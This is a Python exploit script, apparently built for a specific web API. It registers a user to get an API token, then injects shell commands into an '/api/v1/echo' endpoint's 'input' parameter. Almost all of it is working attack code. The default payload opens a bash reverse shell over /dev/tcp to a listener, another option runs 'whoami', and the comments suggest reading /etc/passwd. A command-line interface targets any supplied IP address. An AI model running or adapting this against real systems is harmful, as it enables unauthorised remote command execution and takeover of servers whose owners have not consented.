OSCommandInjection

import sys
import argparse
import requests


# ASCII banner
banner = """
██╗  ██╗███╗   ██╗ ██████╗ ██████╗  ██╗
██║  ██║████╗  ██║██╔════╝ ╚════██╗███║
███████║██╔██╗ ██║███████╗  █████╔╝╚██║
╚════██║██║╚██╗██║██╔═══██╗ ╚═══██╗ ██║
     ██║██║ ╚████║╚██████╔╝██████╔╝ ██║
     ╚═╝╚═╝  ╚═══╝ ╚═════╝ ╚═════╝  ╚═╝ 
"""

# ANSI escape codes for colors
GREEN = "\033[92m"
RED = "\033[91m"
BLUE = "\033[34m"
CYAN = "\033[96m"
RESET = "\033[0m"

# Example user
default_email = 'defaultuser@example.com'    # Default email used for registration.
organization = 'Your Organization'           # Default organization used for registration.
use_case = 'Example Use Case'                # Default use case used for registration.

# Function to register a user
def register_user(target_ip, email=default_email, organization=organization, use_case=use_case):
    # Construct the URL for user registration
    url = f'http://{target_ip}/api/v1/register'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36',
        'Content-Type': 'application/json'
    }

    # User information for registration
    userinfo = {
        'user': {
            'email': email,
            'organization': organization,
            'use_case': use_case
        }
    }

    # Send a POST request to register the user
    response = requests.post(url, headers=headers, json=userinfo)
    
    # Check if registration was successful
    if response.status_code == 200:
        return response.json().get('api_token')
    else:
        print(RED + f"Failed to register user: {response.text}" + RESET)
        return None

# Function to execute the payload
def execute_payload(target_ip, listener_ip, api_token, port=4242, payload_type='reverseshell'):
    # Construct the URL for executing the payload
    url = f'http://{target_ip}/api/v1/echo'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36',
        'Content-Type': 'application/json',
        'X-API-TOKEN': api_token
    }

    # Payload options
    payloads = {
        'reverseshell': f';(bash -c "bash -i >& /dev/tcp/{listener_ip}/{port} 0>&1") &',
        'basic': f';(whoami) &'    # Can be replaced with any other commands like cat /etc/passwd'
    }

    # Select payload based on payload_type
    payload = payloads.get(payload_type, payloads['reverseshell'])

    if payload_type == 'reverseshell':
        print(BLUE + "[*] Reverse shell Command injected. Check your listener." + RESET)
        # Send a GET request to execute the payload
        response = requests.get(url, headers=headers, params={'input': payload})
        return response.text
    else:
        command_executed = payload.split(';')[1].split('&')[0].strip()
        print(BLUE + f"[*] Executed command: {command_executed}" + RESET)
        # For basic command execution, directly return the response
        response = requests.get(url, headers=headers, params={'input': payload})
        return response.text

if __name__ == "__main__":
    # Argument Parser
    parser = argparse.ArgumentParser(prog="exploit.py", description="A Python3 script to perform OS command injection and get a reverse shell.")
    parser.add_argument("--target_ip", help="IP address of the target like 10.x.50.x", required=True)
    parser.add_argument("--listener_ip", help="IP address of the listener", default="127.0.0.1")
    parser.add_argument("--listener_port", help="Port number of the listener", type=int, default=4242)
    parser.add_argument("--email", help="Email address for user registration", default=default_email)
    parser.add_argument("--payload", help="Type of payload to use (basic/reverseshell). The 'basic' payload allows users to execute basic commands like 'whoami', 'cat /etc/passwd', etc. Replace 'basic' with any desired command. \
         The 'reverseshell' payload spawns a reverse shell to the specified listener IP and port.", default="reverseshell", choices=["basic", "reverseshell"])
    parser.add_argument("--no-banner", action="store_true", help="Do not print the banner")
    args = parser.parse_args()

    if not args.no_banner:
        print(CYAN + banner + RESET)

    # Register the user and obtain API token
    api_token = register_user(args.target_ip, email=args.email)
    if api_token:
        print(GREEN + f"[+] User registered successfully. API token: {api_token}" + RESET)
        # Execute the payload to get a reverse shell
        response_text = execute_payload(args.target_ip, args.listener_ip, api_token, args.listener_port, args.payload)
        print(response_text)
    else:
        print(RED + "[!] User registration failed. Use a different email." + RESET)